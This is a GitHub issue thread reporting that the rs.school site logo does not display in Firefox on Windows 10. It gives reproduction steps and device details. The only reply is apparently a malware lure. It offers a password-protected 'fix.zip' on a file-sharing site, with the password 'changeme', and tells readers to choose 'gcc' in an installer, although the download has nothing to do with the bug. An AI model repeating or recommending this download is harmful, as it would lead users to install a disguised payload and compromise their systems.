### ISSUE TITLE
Logo not showing in Firefox

### ISSUE THREAD

**Issue by MielomankA** [rolling-scopes/site#459]
## 🐛 Describe the Bug

Logo not showing in Firefox. Presumably only on Windows, since it works on a Mac

## 🔄 Steps to Reproduce

Provide the steps to reproduce the behavior:
1. Navigate to https://rs.school/
2. Show header/footer

## 🏁 Actual Behavior 

Logo not showing

## 🏁 Expected Behavior

The logo should be displayed

## 📸 Screenshots

![Image](https://github.com/user-attachments/assets/ae5cf19f-b8e5-40c9-a416-ace39a1cf8ab)

## 🕹 Device Information

- OS: Win 10
- Browser: Firefox, 129.0.2 (last)
- Screen size - desktop/mobile

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
